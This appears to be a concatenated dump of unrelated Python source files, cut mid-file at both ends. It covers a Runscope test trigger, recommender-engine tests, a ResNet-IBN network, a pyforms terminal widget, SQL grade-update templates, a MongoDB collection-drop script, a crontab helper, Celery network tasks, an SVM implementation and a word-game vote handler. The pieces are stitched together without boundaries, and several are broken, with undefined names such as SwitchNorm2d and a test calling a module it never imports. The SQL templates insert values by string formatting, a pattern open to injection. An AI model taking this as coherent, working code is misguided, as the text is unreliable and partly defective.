not result_data: continue result = result_data.get("result") if result in ["pass", "fail"]: results[test_run_id] = result_data elif result == "working": # Results aren't ready yet. Will retry the next # time through the loop. pass else: print("Got response with unknown result field. Full response was %s" % result_data) pass_count = sum([r.get("result") == "pass" for r in list(results.values())]) fail_count = sum([r.get("result") == "fail" for r in list(results.values())]) if fail_count > 0: print("{} test runs passed. {} test runs failed.".format(pass_count, fail_count)) exit(1) print("All test runs passed.") def _get_result(test_run): # generate Personal Access Token at https://www.runscope.com/applications if "RUNSCOPE_ACCESS_TOKEN" not in os.environ: print("Please set the environment variable RUNSCOPE_ACCESS_TOKEN. You can get an access token by going to https://www.runscope.com/applications") exit(1) API_TOKEN = os.environ["RUNSCOPE_ACCESS_TOKEN"] opts = { "base_url": "https://api.runscope.com", "bucket_key": test_run.get("bucket_key"), "test_id": test_run.get("test_id"), "test_run_id": test_run.get("test_run_id") } result_url = "{base_url}/buckets/{bucket_key}/tests/{test_id}/results/{test_run_id}".format(**opts) print("Getting result: {}".format(result_url)) headers = { "Authorization": "Bearer {}".format(API_TOKEN), "User-Agent": "python-trigger-sample" } result_resp = requests.get(result_url, headers=headers) if result_resp.status_code == 404: print('Unable to find test run result at %s' % result_url) return if result_resp.ok: data = result_resp.json().get("data") if not data: print("Response data was empty. Full response was %s" % result_resp.text) return data # States Title, recently experenced a false positive. This should provide some # more information in the event of another failure print( "Result response not ok... Check Runscope for more information: " "https://www.runscope.com/radar/{bucket_key}/{test_id}/history/{test_run_id}" .format(**opts) ) print("\n\nResponse: {}".format(result_resp.text)) # Currently unrecoverable, TODO: revisit if false positive presist exit(1) if __name__ == '__main__': main() import sys import os import logging class Utils(object): """ Utility functions. """ @staticmethod def log_to_stdout(level=logging.INFO): """ Sets up logging to stdout at the (optional) level specified. """ root = logging.getLogger() root.setLevel(level) handler = logging.StreamHandler(sys.stdout) handler.setLevel(level) formatter = logging.Formatter('%(asctime)s: %(levelname)s - %(message)s') handler.setFormatter(formatter) root.addHandler(handler) @staticmethod def path_relative_to_module(module_file_path, filename): """ Returns a path for filename in the same folder as the module_file_path. When calling this, you will usually pass __file__ as the module_file_path parameter. """ return os.path.join(os.path.dirname(module_file_path), filename)0 from unittest import TestCase from kiwi.ContentEngine import ContentEngine import pandas as pd from kiwi.TransferTypes import Vote class ContentEngineTest(TestCase): def setUp(self): self.empty_content_frame = pd.DataFrame([], columns=['ItemId', 'Tags']) self.empty_ratings_frame = pd.DataFrame( [], columns=['UserId', 'ItemId', 'Like']) self.full_content_frame = pd.DataFrame.from_records( [('i1', 'Action|Comedy'), ('i2', 'Action|Adventure')], columns=['ItemId', 'Tags']) self.full_rating_frame = pd.DataFrame.from_records( [('u1', 'i1', 1), ('u2', 'i1', -1)], columns=['UserId', 'ItemId', 'Like']) def test_empty_setup_does_not_train(self): engine = ContentEngine( self.empty_content_frame, self.empty_ratings_frame) with self.assertRaises(ValueError): engine.fit() self.assertIsNone(engine.tf_vectors) self.assertIsNone(engine.user_vectors) def test_empty_setup_with_content(self): engine = ContentEngine( self.full_content_frame, self.empty_ratings_frame) engine.fit() self.assertFalse(engine.tf_vectors.empty) self.assertTrue(engine.user_vectors.empty) columns = engine.user_vectors.columns index = engine.user_vectors.index self.assertTrue(all(columns.contains(x) for x in [0, 1, 2])) self.assertTrue(index.empty) def test_empty_initial_ratings_rating_added(self): engine = ContentEngine( self.full_content_frame, self.empty_ratings_frame) engine.fit() engine.update_ratings(Vote(user='u1', post='1', vote=1)) engine.build_user_taste_vector('u1', insert=True) self.assertEqual(engine.user_vectors.shape, (1, 3)) def test_existing_taste_vector_does_not_change_without_update(self): engine = ContentEngine( self.full_content_frame, self.full_rating_frame) engine.fit() # engine.update_ratings(('u1', 'i2', 1)) vector1 = engine.user_vectors.loc['u1'] vector2 = engine.build_user_taste_vector('u1') self.assertEqual(vector1.tolist(), vector2.tolist()) def test_update_existing_taste_vector(self): engine = ContentEngine( self.full_content_frame, self.full_rating_frame) engine.fit() engine.update_ratings(('u1', 'i2', 1)) vector1 = engine.user_vectors.loc['u1'].tolist() vector2 = engine.build_user_taste_vector('u1', insert=True) inserted = engine.user_vectors.loc['u1'] self.assertNotEqual(vector1, vector2.tolist()) self.assertEqual(vector2.tolist(), inserted.tolist()) def test_get_nonexisting_user_vector_raises(self): engine = ContentEngine( self.full_content_frame, self.full_rating_frame) engine.fit() with self.assertRaises(KeyError): engine.user_vectors.loc['u3']import math import torch import torch.nn as nn class IBN(nn.Module): def __init__(self, planes): super(IBN, self).__init__() half1 = int(planes/2) self.half = half1 half2 = planes - half1 self.IN = nn.InstanceNorm2d(half1, affine=True) self.BN = nn.BatchNorm2d(half2) def forward(self, x): split = torch.split(x, self.half, 1) out1 = self.IN(split[0].contiguous()) out2 = self.BN(split[1].contiguous()) out = torch.cat((out1, out2), 1) return out ibns = { 'none': nn.BatchNorm2d, 'a': IBN, 'b': nn.BatchNorm2d, 'ab':IBN, 's': SwitchNorm2d } class Bottleneck(nn.Module): expansion = 4 def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, ibn_mode='none'): super(Bottleneck, self).__init__() self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False) # self.bn1 = nn.BatchNorm2d(planes) self.bn1 = ibns[ibn_mode](planes) self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, dilation=dilation, padding=dilation, bias=False) self.bn2 = nn.BatchNorm2d(planes) self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False) self.bn3 = nn.BatchNorm2d(planes * 4) self.IN = None if ibn_mode == 'b' or ibn_mode == 'ab': self.IN = nn.InstanceNorm2d(planes * 4, affine=True) self.relu = nn.ReLU(inplace=True) self.downsample = downsample self.stride = stride self.dilation = dilation def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) out = self.relu(out) out = self.conv3(out) out = self.bn3(out) if self.downsample is not None: residual = self.downsample(x) out += residual if self.IN is not None: out = self.IN(out) out = self.relu(out) if TRACK_FEAT: SHARED_LIST.append(out) return out class ResNet(nn.Module): def __init__(self, block, layers, output_stride, ibn_mode='none',renet = 'resnet101'): self.inplanes = 64 super(ResNet, self).__init__() blocks = [1, 2, 4] if output_stride == 32: strides = [1, 2, 2, 2] dilations = [1, 1, 1, 2] elif output_stride == 16: strides = [1, 2, 2, 1] dilations = [1, 1, 1, 2] elif output_stride == 8: strides = [1, 2, 1, 1] dilations = [1, 1, 2, 4] else: raise NotImplementedError # Modules self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False) if ibn_mode == 'b': self.bn1 = nn.InstanceNorm2d(64, affine=True) else: self.bn1 = nn.BatchNorm2d(64) self.relu = nn.ReLU(inplace=True) self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) self.layer1 = self._make_layer(block, 64, layers[0], stride=strides[0], dilation=dilations[0], ibn_mode=ibn_mode) self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], dilation=dilations[1], ibn_mode=ibn_mode) self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], dilation=dilations[2], ibn_mode=ibn_mode) self.layer4 = self._make_MG_unit(block, 512, blocks=blocks, stride=strides[3], dilation=dilations[3], ibn_mode=ibn_mode) for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() def _make_layer(self, block, planes, blocks, stride=1, dilation=1, ibn_mode='none'): downsample = None if stride != 1 or self.inplanes != planes * block.expansion: downsample = nn.Sequential( nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(planes * block.expansion), ) layers = [] layers.append(block(self.inplanes, planes, stride, dilation, downsample, ibn_mode)) self.inplanes = planes * block.expansion for i in range(1, blocks): layers.append(block(self.inplanes, planes, dilation=dilation, ibn_mode=ibn_mode)) return nn.Sequential(*layers) def _make_MG_unit(self, block, planes, blocks, stride=1, dilation=1, ibn_mode='none'): downsample = None if stride != 1 or self.inplanes != planes * block.expansion: downsample = nn.Sequential( nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(planes * block.expansion), ) layers = [] if planes == 512: ibn_mode = 'none' layers.append(block(self.inplanes, planes, stride, dilation=blocks[0]*dilation, downsample=downsample, ibn_mode=ibn_mode)) self.inplanes = planes * block.expansion for i in range(1, len(blocks)): layers.append(block(self.inplanes, planes, stride=1, dilation=blocks[i]*dilation, ibn_mode=ibn_mode)) return nn.Sequential(*layers) def forward(self, input): low_level_feats = [] if TRACK_FEAT: SHARED_LIST.clear() x = self.conv1(input) x = self.bn1(x) x = self.relu(x) if TRACK_FEAT: SHARED_LIST.append(x) x = self.maxpool(x) x = self.layer1(x) low_level_feats.append(x) x = self.layer2(x) low_level_feats.append(x) x = self.layer3(x) low_level_feats.append(x) x = self.layer4(x) return x, low_level_feats def _load_pretrained_model(model, url=None, path=None): if url is not None: pretrain_dict = model_zoo.load_url(url) else: pretrain_dict = torch.load(path) model_dict = {} state_dict = model.state_dict() for k, v in pretrain_dict.items(): # print(k) if k in state_dict: model_dict[k] = v else: print(k) state_dict.update(model_dict) model.load_state_dict(state_dict) def ResNet50(output_stride, ibn_mode='none', pretrained=True): """Constructs a ResNet-50 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 6, 3], output_stride, ibn_mode) if pretrained: if ibn_mode == 'none': _load_pretrained_model(model, url='https://download.pytorch.org/models/resnet50-19c8e357.pth') elif ibn_mode == 'a' or ibn_mode == 'ab' or ibn_mode == 's': _load_pretrained_model(model, path='pretrained/resnet50_ibn_a.pth') elif ibn_mode == 'b': _load_pretrained_model(model, path='pretrained/resnet50_ibn_b.pth') else: raise NotImplementedError return model def ResNet101(output_stride, ibn_mode='none', pretrained=True): """Constructs a ResNet-101 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 23, 3], output_stride, ibn_mode) if pretrained: if ibn_mode == 'none': _load_pretrained_model(model, url='https://download.pytorch.org/models/resnet101-5d3b4d8f.pth') elif ibn_mode == 'a' or ibn_mode == 'ab' or ibn_mode == 's': _load_pretrained_model(model, path='pretrained/resnet101_ibn_a.pth') elif ibn_mode == 'b': _load_pretrained_model(model, path='pretrained/resnet101_ibn_b.pth') else: raise NotImplementedError return model if __name__ == "__main__": import torch model = ResNet101(output_stride=8, ibn_mode='a', pretrained=True) input = torch.rand(1, 3, 512, 512) output, low_level_feat = model(input) print(output.size()) print(low_level_feat.size()) default_app_config = 'libs.core.cms.api.apps.CMSConfig' Jess3Jane/pyforms from pyforms.terminal.Controls.ControlFile import ControlFile from pyforms.terminal.Controls.ControlSlider import ControlSlider from pyforms.terminal.Controls.ControlText import ControlText from pyforms.terminal.Controls.ControlCombo import ControlCombo from pyforms.terminal.Controls.ControlCheckBox import ControlCheckBox from pyforms.terminal.Controls.ControlBase import ControlBase from pyforms.terminal.Controls.ControlDir import ControlDir from pyforms.terminal.Controls.ControlNumber import ControlNumber from datetime import datetime, timedelta import argparse, uuid, os, shutil, time, sys, subprocess import simplejson as json try: import requests except: print("No requests lib") class BaseWidget(object): def __init__(self, *args, **kwargs): self._parser = argparse.ArgumentParser() self._controlsPrefix = '' self._title = kwargs.get('title', args[0] if len(args)>0 else '') self.stop = False self._conf = kwargs.get('load', None) ############################################################################ ############ Module functions ############################################# ############################################################################ def init_form(self, parse=True): result = {} for fieldname, var in self.controls.items(): name = var._name if isinstance(var, ( ControlFile, ControlSlider, ControlText, ControlCombo,ControlCheckBox, ControlDir, ControlNumber ) ): self._parser.add_argument("--%s" % name, help=var.label) if parse: self._parser.add_argument('terminal_mode', type=str, default='terminal_mode', help='Flag to run pyforms in terminal mode') self._parser.add_argument( "--exec{0}".format(self._controlsPrefix), default='', help='Function from the application that should be executed. Use | to separate a list of functions.') self._parser.add_argument( "--load{0}".format(self._controlsPrefix), default=None, help='Load a json file containing the pyforms form configuration.') self._args = self._parser.parse_args() self.__parse_terminal_parameters() self.__execute_events() def load_form(self, data, path=None): allparams = self.controls if hasattr(self, 'load_order'): for name in self.load_order: param = allparams[name] if name in data: param.load_form(data[name]) else: for name, param in allparams.items(): if name in data: param.load_form(data[name]) def __parse_terminal_parameters(self): for fieldname, var in self.controls.items(): name = var._name if self._args.__dict__.get(name, None): if isinstance(var, ControlFile): value = self._args.__dict__[name] if value!=None and (value.startswith('http://') or value.startswith('https://')): local_filename = value.split('/')[-1] outputFileName = os.path.join('input', local_filename) self.__downloadFile(value, outputFileName) var.value = outputFileName else: var.value = value if isinstance(var, ControlDir): value = self._args.__dict__[name] var.value = value elif isinstance(var, (ControlText, ControlCombo)): var.value = self._args.__dict__[name] elif isinstance(var, ControlCheckBox): var.value = self._args.__dict__[name]=='True' elif isinstance(var, (ControlSlider, ControlNumber) ): var.value = int(self._args.__dict__[name]) if self._args.load: print('\n--------- LOADING CONFIG ------------------') with open(self._args.load) as infile: data = json.load(infile) self.load_form(data, os.path.dirname(self._args.load)) print('--------- END LOADING CONFIG --------------\n') elif self._conf is not None: print('\n--------- LOADING DEFAULT CONFIG ------------------') self.load_form(self._conf, '.') print('--------- END LOADING DEFAULT CONFIG --------------\n') def __execute_events(self): for function in self._args.__dict__.get("exec{0}".format(self._controlsPrefix), []).split('|'): if len(function)>0: getattr(self, function)() res = {} for controlName, control in self.controls.items(): res[controlName] = {'value': control.value } with open('out-parameters.txt', 'w') as outfile: outfile.write( str(res) ) def __downloadFile(self, url, outFilepath): chunksize = 512*1024 r = requests.get(url, stream=True) with open(outFilepath, 'w') as f: for chunk in r.iter_content(chunk_size=chunksize): if chunk: f.write(chunk); f.flush(); def execute(self): pass def start_progress(self, total = 100): self._total_processing_count = total self._processing_initial_time = time.time() self._processing_count = 1 def update_progress(self): div = int(self._total_processing_count/400) if div==0: div = 1 if (self._processing_count % div )==0: self._processing_last_time = time.time() total_passed_time = self._processing_last_time - self._processing_initial_time remaining_time = ( (self._total_processing_count * total_passed_time) / self._processing_count ) - total_passed_time if remaining_time<0: remaining_time = 0 time_remaining = datetime(1,1,1) + timedelta(seconds=remaining_time ) time_elapsed = datetime(1,1,1) + timedelta(seconds=(total_passed_time) ) values = ( time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_remaining.day-1, time_remaining.hour, time_remaining.minute, time_remaining.second, (float(self._processing_count)/float(self._total_processing_count))*100.0, self._processing_count, self._total_processing_count, ) print("Elapsed: %d:%d:%d:%d; Remaining: %d:%d:%d:%d; Processed %0.2f %% (%d/%d); | \r" % values) sys.stdout.flush() self._processing_count += 1 def end_progress(self): self._processing_count = self._total_processing_count self.update_progress() def __savePID(self, pid): try: with open('pending_PID.txt', 'w') as f: f.write(str(pid)) f.write('\n') except (IOError) as e: raise e def __savePID(self, pid): try: with open('pending_PID.txt', 'w') as f: f.write(str(pid)) f.write('\n') except (IOError) as e: raise e def executeCommand(self, cmd, cwd=None, env=None): if cwd!=None: currentdirectory = os.getcwd() os.chdir(cwd) print(" ".join(cmd)) proc = subprocess.Popen(cmd) if cwd!=None: os.chdir(currentdirectory) self.__savePID(proc.pid) proc.wait() #(output, error) = proc.communicate() #if error: print 'error: ', error #print 'output: ', output return ''#output def exec_terminal_cmd(self, args, **kwargs): print('TERMINAL <<',' '.join(args) ) sys.stdout.flush() proc = subprocess.Popen(args, **kwargs) self.__savePID(proc.pid) proc.wait() sys.stdout.flush() @property def controls(self): """ Return all the form controls from the the module """ result = {} for name, var in vars(self).items(): if isinstance(var, ControlBase): var._name = self._controlsPrefix+"-"+name if len(self._controlsPrefix)>0 else name result[name] = var return resultUPDATE_GRADE = ''' UPDATE cw_rec SET cw_rec.grd = '{grade}' WHERE jenzcrs_rec.coursekey = '{coursekey}' AND cw_rec.id = {student_number} AND cw_rec.yr = SUBSTRING(jenzcrs_rec.coursekey FROM 1 FOR 4) AND cw_rec.cat = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(coursekey))-8 FOR 4 ) AND cw_rec.sess = SUBSTRING(jenzcrs_rec.coursekey FROM 6 FOR 2) AND cw_rec.prog = right(trim(jenzcrs_rec.coursekey),4) AND cw_rec.crs_no = SUBSTRING( jenzcrs_rec.coursekey FROM 9 for INSTR(jenzcrs_rec.coursekey,';',9)-9 ) AND cw_rec.sec = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(jenzcrs_rec.coursekey))-11 FOR 2 ) AND cw_rec.stat IN ('R', 'A', 'T','N','I') '''.format SELECT_GRADE = ''' SELECT * FROM cw_rec, jenzcrs_rec WHERE jenzcrs_rec.coursekey = '{coursekey}' AND cw_rec.id = {student_number} AND cw_rec.yr = SUBSTRING(jenzcrs_rec.coursekey FROM 1 FOR 4) AND cw_rec.cat = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(coursekey))-8 FOR 4 ) AND cw_rec.sess = SUBSTRING(jenzcrs_rec.coursekey FROM 6 FOR 2) AND cw_rec.prog = right(trim(jenzcrs_rec.coursekey),4) AND cw_rec.crs_no = SUBSTRING( jenzcrs_rec.coursekey FROM 9 for INSTR(jenzcrs_rec.coursekey,';',9)-9 ) AND cw_rec.sec = SUBSTRING( jenzcrs_rec.coursekey FROM length(trim(jenzcrs_rec.coursekey))-11 FOR 2 ) AND cw_rec.stat IN ('R', 'A', 'T','N','I') '''.format early_projects/test_prefixes.py import unittest import prefixes class TestPrefixes(unittest.TestCase): """Tests prefixes.""" def test_above_freezing_above(self): """Test a temperature that is above freezing.""" expected = True actual = temperature.above_freezing(5.2) self.assertEqual(expected, actual, "The temperature is above freezing.") unittest.main() # author: # 18 February 2020 # Bremen def listsort(array): for p in range(len(array)): _ = p for q in range(len(array)-1): while(array[q] > array[q+1]): for i, j in zip(range(len(array)-1), range(1,len(array))): if array[i] > array[j]: array[i], array[j] = array[j], array[i] elif array[i] == array[j]: array[i], array[j] = array[i], array[j] exit return array drop.py #!/usr/bin/env python import argparse from pymongo import MongoClient from dcctools.config import Configuration def parse_args(): parser = argparse.ArgumentParser() parser.add_argument( "--config", default="config.json", help='Configuration file (default "config.json")', ) args = parser.parse_args() return args if __name__ == "__main__": args = parse_args() c = Configuration(args.config) client = MongoClient(c.mongo_uri) database = client.linkage_agent database.match_groups.drop() database.household_match_groups.drop() print("Database cleared.") 100-1000 import env_check from crontab import CronTab import os import sys import getopt def set_crontab(): user_cron = CronTab(user=True) script_path = os.path.join(os.getcwd(), 'main.py') job = user_cron.new(command=f'python3 {script_path}') try: exec_h = int(input('脚本需要每几小时执行一次?')) # TODO: 或许可以加上个检查,如果当天报过了就不再报? except ValueError: raise ValueError('emmm,输入数字就行哈') if not 0 < exec_h <= 24: raise ValueError('emmm,输得不对? 输入范围应该是(0, 24]中的整数哦') job.hour.every(exec_h) job.enable() user_cron.write() def reset_crontab(): user_cron = CronTab(user=True) script_path = os.path.join(os.getcwd(), 'main.py') count = 0 for job in user_cron: if job.command == f'python3 {script_path}': user_cron.remove(job) user_cron.write() count += 1 print(f'成功清除{count}项定时任务~') if __name__ == '__main__': opts, args = getopt.getopt(sys.argv[1:], 'c') is_reset = False for cmd, arg in opts: if cmd == '-c': is_reset = True if is_reset: reset_crontab() else: set_crontab() # -*- coding: utf-8 -*- import os def get_data_dir(): curr_dir = os.path.dirname(os.path.realpath(__file__)) data_dir = curr_dir+"/../../../../data" return(data_dir) def get_output_dir(): curr_dir = os.path.dirname(os.path.realpath(__file__)) output_dir = curr_dir+"/../../../../output" return(output_dir)import csv # Documentation # https://docs.python.org/3.7/library/csv.html # csv.reader already splits the list data so daae[0] works out of the box. def readcsv(filepath): ''' Read file in filepath, return all rows as a list type. Call function: ```readcsv('data/file0.csv')``` ''' with open(filepath, newline='', encoding='utf-8') as data: data = csv.reader(data, delimiter=',', quotechar='|') rowofdata = [] for row in data: rowofdata.append(row) return rowofdata # print(readcsv('data/file0.csv')) # expected output [['file0,line0'], ['file0,line1'], ['file0,line2'], ['file0,line3'], ['file0,line4'], ['file0,line5']] # -*- coding: utf-8 -*- from celery.utils.log import get_task_logger from networkapi import celery_app from networkapi.api_network.facade import v3 as facade from networkapi.api_task.classes import BaseTask from networkapi.usuario.models import Usuario logger = get_task_logger(__name__) @celery_app.task(bind=True, base=BaseTask) def create_networkv4(self, net_dict, user_id): msg = { 'object_type': 'networkv4', 'action': 'allocate', } self.update_state( state='PROGRESS', meta=msg ) user = Usuario.objects.get(id=user_id) try: net = facade.create_networkipv4(net_dict, user) except Exception, exception: msg['message'] = 'NetworkV4 was not allocated.' msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was allocated with success.'.format(net) msg['object_id'] = net.id return msg @celery_app.task(bind=True, base=BaseTask) def update_networkv4(self, net_dict, user_id): msg = { 'object_type': 'ipv4', 'action': 'update', 'object_id': net_dict.get('id') } self.update_state( state='PROGRESS', meta=msg ) net_obj = facade.get_networkipv4_by_id(net_dict.get('id')) user = Usuario.objects.get(id=user_id) try: facade.update_networkipv4(net_dict, user) except Exception as exception: msg['message'] = 'NetworkV4 {} was not updated.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was updated with success.'.format( net_obj) return msg @celery_app.task(bind=True, base=BaseTask) def delete_networkv4(self, net_id, user_id): msg = { 'object_type': 'networkv4', 'action': 'deallocate', 'object_id': net_id } self.update_state( state='PROGRESS', meta=msg ) net_obj = facade.get_networkipv4_by_id(net_id) try: facade.delete_networkipv4(net_id) except Exception, exception: msg['message'] = 'NetworkV4 {} was not deallocated.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was deallocated with success.'.\ format(net_obj) return msg @celery_app.task(bind=True, base=BaseTask) def deploy_networkv4(self, net_id, user_id): msg = { 'object_type': 'networkv4', 'action': 'deploy', 'object_id': net_id } self.update_state( state='PROGRESS', meta=msg ) user = Usuario.objects.get(id=user_id) net_obj = facade.get_networkipv4_by_id(net_id) try: networkv4 = net_obj.networkv4 status_deploy = facade.deploy_networkipv4(net_id, user) except Exception, exception: msg['message'] = 'NetworkV4 {} was not deployed.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was deployed with success. {}'.format( networkv4, status_deploy) return msg @celery_app.task(bind=True, base=BaseTask) def undeploy_networkv4(self, net_id, user_id): msg = { 'object_type': 'networkv4', 'action': 'undeploy', 'object_id': net_id } self.update_state( state='PROGRESS', meta=msg ) user = Usuario.objects.get(id=user_id) net_obj = facade.get_networkipv4_by_id(net_id) try: networkv4 = net_obj.networkv4 status_deploy = facade.undeploy_networkipv4(net_id, user) except Exception, exception: msg['message'] = 'NetworkV4 {} was not deployed.'.format(net_obj) msg['reason'] = str(exception) raise Exception(msg) else: msg['message'] = 'NetworkV4 {} was undeployed with success. {}'.\ format(networkv4, status_deploy) return msg 1-10 import numpy as np class BinaryClassificationSVM(object): """ This class implements binary classification SVM. Args: C(float): Regularization factor. Default 0. kernel(str): Kernel function. {"linear": linear kernel, "poly": polynomial kernel, "rbf": radial basis kernel, "sigmoid": sigmoid kernel.} gamma: Parameter in poly/rbf/sigmoid kernel. degree: Parameter in poly kernel. coef: Constant parameter in poly/sigmoid kernel. Attributes: alpha: coefficient of each vector in classifier. b: constant coefficient in classifier. Methods: fit(x, y, max_iteration=100): Fit the SVM model according to the given training data. predict(x): Perform classification on samples in X. """ def __init__(self, C=0.0, kernel="linear", gamma=None, degree=3, coef=1): """ Constructor method. """ self.C = C self.kernel = kernel self.gamma = gamma self.degree = degree self.coef = coef self.alpha = None self.b = 0 self.x = None self.y = None self.kernel_matrix = None def fit(self, x, y, max_iteration=100): """ Fit the SVM model according to the given training data. Args: x: Array of data. Shape {amount_of_data, number_of_dimension_of_each_data} y: Labels of data. Class should be represented by -1/1. Shape {amount_of_data, } max_iteration(int): Maximum iteration times of SMO algorithms. Default 100. Return: object: SVM model """ self.x = x self.y = y self.alpha = np.zeros([y.shape[0]]) self.kernel_matrix = self.__kernel(self.x, self.x) for i in range(max_iteration): if self.__iteration() == -1: break return self def predict(self, x): """ Perform classification on samples in X. Return: Labels of data. Shape {amount_of_data, } """ kernel = self.__kernel(x, self.x) gx = np.sum(kernel * self.alpha * self.y, axis=1) + self.b return np.sign(gx).astype(np.int) def __iteration(self): """ Find alpha1 alpha2 and update the value. """ new_index_1 = None gx = np.sum(self.kernel_matrix * self.alpha * self.y, axis=1) + self.b ex = gx - self.y for i in range(self.alpha.shape[0]): if 0 < self.alpha[i] < self.C and gx[i] * self.y[i] != 1: new_index_1 = i break if new_index_1 is None: for i in range(self.alpha.shape[0]): if self.alpha[i] == 0 and gx[i] * self.y[i] < 1: new_index_1 = i break if self.alpha[i] == self.C and gx[i] * self.y[i] > 1: new_index_1 = i break if new_index_1 is None: return -1 _ex = np.abs(ex.copy() - ex[new_index_1]) _ex[new_index_1] = -np.inf new_index_2 = np.argmax(_ex) eta = self.kernel_matrix[new_index_1, new_index_1] + \ self.kernel_matrix[new_index_2, new_index_2] - \ self.kernel_matrix[new_index_1, new_index_2] * 2 new_value_2 = self.y[new_index_2] * (ex[new_index_1] - ex[new_index_2]) / eta + self.alpha[new_index_2] if self.y[new_index_1] != self.y[new_index_2]: _l = max(0, self.alpha[new_index_2] - self.alpha[new_index_1]) _h = min(self.C, self.C + self.alpha[new_index_2] - self.alpha[new_index_1]) else: _l = max(0, self.alpha[new_index_2] + self.alpha[new_index_1] - self.C) _h = min(self.C, self.alpha[new_index_2] + self.alpha[new_index_1]) if new_value_2 > _h: new_value_2 = _h if new_value_2 < _l: new_value_2 = _l new_value_1 = self.y[new_index_1] * self.y[new_index_2] * (self.alpha[new_index_2] - new_value_2) + \ self.alpha[new_index_1] b1 = -ex[new_index_1] - \ self.y[new_index_1] * self.kernel_matrix[new_index_1, new_index_1] * (new_value_1 - self.alpha[new_index_1]) - \ self.y[new_index_2] * self.kernel_matrix[new_index_2, new_index_1] * (new_value_2 - self.alpha[new_index_2]) + \ self.b b2 = -ex[new_index_2] - \ self.y[new_index_1] * self.kernel_matrix[new_index_1, new_index_2] * (new_value_1 - self.alpha[new_index_1]) - \ self.y[new_index_2] * self.kernel_matrix[new_index_2, new_index_2] * (new_value_2 - self.alpha[new_index_2]) + \ self.b self.b = (b1 + b2) / 2 self.alpha[new_index_1] = new_value_1 self.alpha[new_index_2] = new_value_2 return 0 def __kernel(self, x, y): """ Calculate kernel value between data in x and data in y. Return: Kernel , shape {amount_of_data_in_x, amount_of_data_in_y} """ res = None if self.kernel == "linear": res = np.dot(x, y.T) if self.gamma is None: self.gamma = 1 / self.x.shape[1] if self.kernel == "poly": res = np.dot(x, y.T) * self.gamma + self.coef res = res ** self.degree if self.kernel == "rbf": res = np.array([np.sum((y - x[i]) ** 2, axis=1) for i in range(x.shape[0])]) res = np.exp(-self.gamma * res[1:]) if self.kernel == "sigmoid": res = np.dot(x, y.T) * self.gamma - self.coef res = np.tanh(res) return np.reshape(res, [x.shape[0], y.shape[0]]) # in case that x/y contains only one data. aibenStunner/HackerRank #!/bin/python3 import math import os import random import re import sys # Complete the findDigits function below. def findDigits(n): count = 0 for num in str(n): try: if n % int(num) == 0: count += 1 except ZeroDivisionError: pass return count if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') t = int(input()) for t_itr in range(t): n = int(input()) result = findDigits(n) print(result) fptr.write(str(result) + '\n') fptr.close() L-F-A/Machine-Learning0 import pickle #Saving or loading a particular model. Meaning saving or loading an object containing #the different parameters of one ML model # #If saving, should looks like: #object = Object() #filehandler = open(filename, 'w') #pickle.dump(object, filehandler) # #If loading, should looks like: #filehandler = open(filename, 'r') #object = pickle.load(filehandler) def SaveLoadModel(filename,action='s',obj=None): if action is 's': object_to_save = obj file_obj = open(filename, 'w') pickle.dump(object_to_save, file_obj) return 0. elif action is 'L': filehandler = open(filename,'r') return pickle.load(filehandler) tomiyee/6.08-Final-Project0 import json import sqlite3 import os import random bluffalo_db = os.path.dirname(__file__) + '/game_data.db' word_db = os.path.dirname(__file__) + '/../word-database/word_bank.db' # Note json.loads(String) and json.dumps(Objects) def vote (request): """ Given the POST request with: String room_code - The characters that rep the room code String user - The user name of the person who is voting Int choice - The index of the bluff (0-indexed) in Returns number of people who haven't voted yet? """ request_form = request['form'] if 'room_code' not in request_form: return "Misssing Room Code" if 'user' not in request_form: return "Misssing User Name" if 'choice' not in request_form: return "Misssing Choice Number" room_code = request_form['room_code'].strip() user = request_form['user'].strip() choice_index = int(request_form['choice']) # Connect to the SQL Database and try to find the room_code conn = sqlite3.connect(bluffalo_db) connection = conn.cursor() room_rows = connection.execute('''SELECT game_data FROM game_table WHERE room_code = ?;''', (room_code,)).fetchall() # Return an error if there is not a room with the room code if len(room_rows) == 0: conn.commit() conn.close() return "Room does not exist" # Loads the dictionary and the short cut variables room_data = json.loads(room_rows[0][0]) game_data = room_data['game_data'] player_data = room_data['player_data'] # Generates the set of alphebetically sorted bluffs bluffs = set() for player in player_data: if not player_data[player]['submitted']: bluffs.add("No Submission") else: bluffs.add(player_data[player]['submission']) bluffs.remove(player_data[user]['submission']) # Add the Correct Answer round_number, question_number = game_data['round_number'], game_data['question_number'] word_number = (round_number - 1) * 3 + question_number - 1 current_word, current_meaning, current_ans = game_data['all_prompts'][word_number] bluffs.add(current_ans) # Sorts all the options in alphabetical order bluffs = sorted(list(bluffs)) if bluffs[choice_index] == current_ans: 